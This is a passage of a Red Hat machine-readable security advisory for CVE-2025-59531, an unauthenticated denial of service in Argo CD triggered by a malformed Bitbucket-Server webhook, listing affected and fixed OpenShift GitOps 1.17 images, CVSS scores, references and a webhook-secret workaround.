"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2400935"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service vulnerability was identified in the Argo CD continuous delivery tool, which is distributed as part of Red Hat GitOps product. An unauthenticated attacker can exploit this flaw by sending a specially crafted request to the Application Programming Interface (API) webhook endpoint. This action causes the API server to crash, preventing it from restarting properly. By repeatedly targeting the server, an attacker can cause a complete service outage, making the Argo CD interface unavailable to all users. This vulnerability is only exposed in configurations where a specific webhook secret has not been set.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "argocd: argocd-server: gitops: Unauthenticated argocd-server panic via a malicious Bitbucket-Server webhook payload",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability was rated as Important by the Red Hat Product Security team, this happens because an unauthenticated attacker is able to cause a denial of service from the whole GitOps cluster. This vulnerability affects only clusters without a configured \u0027webhook.bitbucket.secret\u0027 configuration key, thus clusters that have this option configured are not exposed to this flaw.\n\nThis vulnerability lies in a unsafe cast when trying to retrieve the `repository.links.clone`JSON field from BitBucket-Server push request. When the unsafe cast is triggered, the goroutine created by the worker to process the request will fail within an assertion panic and, as it lacks a recovery routine, the whole argocd-server binary will be terminated. If an attacker manages to force all the argocd-server replica nodes to reach this assertion failure, a Denial of Service of the whole cluster will happen.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-59531"
},
{
"category": "external",
"summary": "RHBZ#2400935",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400935"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-59531",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59531"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-59531",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59531"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/commit/5c466a4e39802e059e75c0008ae7b7b8e842538f",
"url": "https://github.com/argoproj/argo-cd/commit/5c466a4e39802e059e75c0008ae7b7b8e842538f"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-f9gq-prrc-hrhc",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-f9gq-prrc-hrhc"
}
],
"release_date": "2025-10-01T20:49:35.428000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-09T18:48:05+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:17731"
},
{
"category": "workaround",
"details": "If a BitBucket repository is being used by GitOps it\u0027s possible to mitigate this vulnerability by setting up a BitBucket webhook secret to ensure only trusted parties can access the webhook endpoint.\n\nIn case BitBucket is not being used, the user can set the webhook secret to a long random value to prevent the webhook from being called:\n\n~~~\napiVersion: v1\nkind: Secret\nmetadata:\n name: argocd-secret\ntype: Opaque\ndata:\n+ webhook.bitbucketserver.secret: \u003cyour base64-encoded secret here\u003e\n~~~",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
